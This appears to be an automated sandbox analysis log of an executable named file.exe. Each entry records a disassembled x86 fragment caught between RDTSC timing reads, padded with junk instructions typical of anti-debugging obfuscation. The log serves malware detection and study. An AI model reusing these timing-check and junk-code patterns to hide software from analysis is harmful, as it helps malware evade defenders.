Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 507018B second address: 5070191 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5090BCD second address: 5090C0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, F99Ah 0x00000007 mov ch, dl 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d jmp 00007FB7D50A5EDAh 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FB7D50A5EDCh 0x0000001c adc esi, 4DA20D08h 0x00000022 jmp 00007FB7D50A5EDBh 0x00000027 popfd 0x00000028 mov cx, 777Fh 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5090C0C second address: 5090C4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, bh 0x00000005 mov eax, 78817413h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f mov dx, cx 0x00000012 call 00007FB7D509B850h 0x00000017 jmp 00007FB7D509B852h 0x0000001c pop eax 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push esi 0x00000024 pop edx 0x00000025 push esi 0x00000026 pop edx 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5090C4C second address: 5090CB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB7D50A5EE1h 0x00000009 sub esi, 299DDAE6h 0x0000000f jmp 00007FB7D50A5EE1h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FB7D50A5EE0h 0x0000001b xor si, B688h 0x00000020 jmp 00007FB7D50A5EDBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 pop ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FB7D50A5EE5h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50907B6 second address: 50907BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50907BB second address: 509082B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ebx, esi 0x0000000d pushfd 0x0000000e jmp 00007FB7D50A5EE8h 0x00000013 and cx, AA78h 0x00000018 jmp 00007FB7D50A5EDBh 0x0000001d popfd 0x0000001e popad 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov dx, cx 0x00000026 pushfd 0x00000027 jmp 00007FB7D50A5EDEh 0x0000002c adc cx, C4D8h 0x00000031 jmp 00007FB7D50A5EDBh 0x00000036 popfd 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 509082B second address: 50908B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B859h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx esi, di 0x0000000e pushfd 0x0000000f jmp 00007FB7D509B859h 0x00000014 sbb si, 75D6h 0x00000019 jmp 00007FB7D509B851h 0x0000001e popfd 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FB7D509B84Ch 0x00000029 adc cl, FFFFFFF8h 0x0000002c jmp 00007FB7D509B84Bh 0x00000031 popfd 0x00000032 mov ch, 85h 0x00000034 popad 0x00000035 pop ebp 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FB7D509B84Dh 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50908B3 second address: 50908B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50908B7 second address: 50908BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 509070E second address: 509076F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB7D50A5EDFh 0x00000009 adc al, FFFFFFFEh 0x0000000c jmp 00007FB7D50A5EE9h 0x00000011 popfd 0x00000012 push ecx 0x00000013 pop edi 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c movsx ebx, si 0x0000001f pushfd 0x00000020 jmp 00007FB7D50A5EE0h 0x00000025 and ecx, 7744B828h 0x0000002b jmp 00007FB7D50A5EDBh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50903C9 second address: 50903E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D509B859h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50903E6 second address: 509041F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FB7D50A5EE1h 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FB7D50A5EDDh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A02EB second address: 50A030C instructions: 0x00000000 rdtsc 0x00000002 mov edi, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB7D509B858h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A030C second address: 50A0368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FB7D50A5EE1h 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e push ecx 0x0000000f mov edx, 3D5DAF0Eh 0x00000014 pop edi 0x00000015 pushfd 0x00000016 jmp 00007FB7D50A5EE4h 0x0000001b xor ah, 00000058h 0x0000001e jmp 00007FB7D50A5EDBh 0x00000023 popfd 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FB7D50A5EE0h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0368 second address: 50A036C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A036C second address: 50A0372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0372 second address: 50A03A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b mov ecx, 65EB0EE7h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushfd 0x00000013 jmp 00007FB7D509B84Ah 0x00000018 or ax, 6B18h 0x0000001d jmp 00007FB7D509B84Bh 0x00000022 popfd 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E0008 second address: 50E000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E000C second address: 50E0029 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B859h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E0029 second address: 50E002F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E002F second address: 50E0033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E0033 second address: 50E006C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d movzx esi, di 0x00000010 jmp 00007FB7D50A5EE1h 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 mov bx, 67C2h 0x0000001c push edi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B0453 second address: 50B0477 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B859h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B0477 second address: 50B047B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B047B second address: 50B0481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B0481 second address: 50B0487 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B0487 second address: 50B04FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B84Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov dx, 73D4h 0x00000011 mov dl, F9h 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 pushad 0x00000016 pushad 0x00000017 movzx eax, bx 0x0000001a pushfd 0x0000001b jmp 00007FB7D509B84Dh 0x00000020 and ch, 00000046h 0x00000023 jmp 00007FB7D509B851h 0x00000028 popfd 0x00000029 popad 0x0000002a pushfd 0x0000002b jmp 00007FB7D509B850h 0x00000030 add ecx, 2DC6C1E8h 0x00000036 jmp 00007FB7D509B84Bh 0x0000003b popfd 0x0000003c popad 0x0000003d mov ebp, esp 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 push edi 0x00000043 pop ecx 0x00000044 pushad 0x00000045 popad 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B04FA second address: 50B053D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EDAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d movzx esi, di 0x00000010 jmp 00007FB7D50A5EE3h 0x00000015 popad 0x00000016 and dword ptr [eax], 00000000h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FB7D50A5EE5h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B053D second address: 50B058A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB7D509B857h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and dword ptr [eax+04h], 00000000h 0x0000000f jmp 00007FB7D509B852h 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FB7D509B857h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B058A second address: 50B0590 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B0590 second address: 50B0594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 509056D second address: 5090573 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5090573 second address: 5090577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5090577 second address: 50905B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov al, dh 0x00000013 pushfd 0x00000014 jmp 00007FB7D50A5EDCh 0x00000019 xor ah, 00000008h 0x0000001c jmp 00007FB7D50A5EDBh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50905B5 second address: 5090640 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB7D509B84Fh 0x00000009 sbb ecx, 0968564Eh 0x0000000f jmp 00007FB7D509B859h 0x00000014 popfd 0x00000015 push esi 0x00000016 pop ebx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FB7D509B84Fh 0x00000025 and ch, 0000005Eh 0x00000028 jmp 00007FB7D509B859h 0x0000002d popfd 0x0000002e pushfd 0x0000002f jmp 00007FB7D509B850h 0x00000034 xor al, 00000058h 0x00000037 jmp 00007FB7D509B84Bh 0x0000003c popfd 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B0008 second address: 50B000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B000C second address: 50B0010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B0010 second address: 50B0016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B02C2 second address: 50B02EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 mov di, EA16h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FB7D509B859h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B02EB second address: 50B02F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B02F1 second address: 50B02F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0641 second address: 50D0645 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0645 second address: 50D064B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D064B second address: 50D0684 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FB7D50A5EDBh 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FB7D50A5EE0h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0684 second address: 50D0688 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0688 second address: 50D068E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D068E second address: 50D06C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B84Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov bx, si 0x0000000f mov ch, 1Eh 0x00000011 popad 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov ebx, 577BCD42h 0x0000001b call 00007FB7D509B853h 0x00000020 pop ecx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D06C7 second address: 50D06FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ecx 0x0000000c pushad 0x0000000d mov al, bl 0x0000000f popad 0x00000010 mov eax, dword ptr [76FB65FCh] 0x00000015 pushad 0x00000016 push edx 0x00000017 mov edi, eax 0x00000019 pop esi 0x0000001a popad 0x0000001b test eax, eax 0x0000001d pushad 0x0000001e push edi 0x0000001f mov edi, eax 0x00000021 pop esi 0x00000022 push eax 0x00000023 push edx 0x00000024 mov ax, dx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D06FF second address: 50D0742 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FB7D509B84Fh 0x00000008 sub al, FFFFFFAEh 0x0000000b jmp 00007FB7D509B859h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 je 00007FB846EFEA7Bh 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov edi, 580C110Eh 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0742 second address: 50D0748 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0748 second address: 50D07C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B84Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, eax 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FB7D509B84Eh 0x00000014 sbb ax, A788h 0x00000019 jmp 00007FB7D509B84Bh 0x0000001e popfd 0x0000001f mov ebx, ecx 0x00000021 popad 0x00000022 xor eax, dword ptr [ebp+08h] 0x00000025 pushad 0x00000026 mov ax, bx 0x00000029 pushfd 0x0000002a jmp 00007FB7D509B84Dh 0x0000002f xor eax, 4C1C36A6h 0x00000035 jmp 00007FB7D509B851h 0x0000003a popfd 0x0000003b popad 0x0000003c and ecx, 1Fh 0x0000003f pushad 0x00000040 mov dl, ah 0x00000042 pushad 0x00000043 mov si, di 0x00000046 mov si, di 0x00000049 popad 0x0000004a popad 0x0000004b ror eax, cl 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D07C5 second address: 50D07DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D07DB second address: 50D0828 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FB7D509B857h 0x0000000b sub cl, FFFFFFEEh 0x0000000e jmp 00007FB7D509B859h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 leave 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FB7D509B84Dh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0828 second address: 50D0838 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D50A5EDCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0838 second address: 50D087E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c mov esi, eax 0x0000000e lea eax, dword ptr [ebp-08h] 0x00000011 xor esi, dword ptr [00762014h] 0x00000017 push eax 0x00000018 push eax 0x00000019 push eax 0x0000001a lea eax, dword ptr [ebp-10h] 0x0000001d push eax 0x0000001e call 00007FB7D9A4BFC9h 0x00000023 push FFFFFFFEh 0x00000025 jmp 00007FB7D509B857h 0x0000002a pop eax 0x0000002b jmp 00007FB7D509B856h 0x00000030 ret 0x00000031 nop 0x00000032 push eax 0x00000033 call 00007FB7D9A4BFF3h 0x00000038 mov edi, edi 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d push ebx 0x0000003e pop eax 0x0000003f pushad 0x00000040 popad 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D087E second address: 50D08EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FB7D50A5EDEh 0x00000011 sbb cx, 15B8h 0x00000016 jmp 00007FB7D50A5EDBh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FB7D50A5EE8h 0x00000022 or esi, 3D92D018h 0x00000028 jmp 00007FB7D50A5EDBh 0x0000002d popfd 0x0000002e popad 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D08EB second address: 50D08F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D08F1 second address: 50D090D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D50A5EE8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D090D second address: 50D0911 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0911 second address: 50D0925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ebx, esi 0x0000000e mov ecx, 03FD67BBh 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0925 second address: 50D0935 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D509B84Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0935 second address: 50D095F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB7D50A5EE5h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D095F second address: 50D096F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D509B84Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D096F second address: 50D097D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c mov ecx, ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5080032 second address: 5080038 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5080038 second address: 508003C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 508003C second address: 508005F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB7D509B856h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 508005F second address: 5080063 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5080063 second address: 5080069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5080069 second address: 50800F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 5ED44E83h 0x00000008 mov si, 4FDFh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], ebp 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FB7D50A5EE0h 0x00000019 xor ax, B648h 0x0000001e jmp 00007FB7D50A5EDBh 0x00000023 popfd 0x00000024 call 00007FB7D50A5EE8h 0x00000029 pushfd 0x0000002a jmp 00007FB7D50A5EE2h 0x0000002f adc eax, 5098DBD8h 0x00000035 jmp 00007FB7D50A5EDBh 0x0000003a popfd 0x0000003b pop ecx 0x0000003c popad 0x0000003d mov ebp, esp 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FB7D50A5EE1h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50800F4 second address: 50800FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
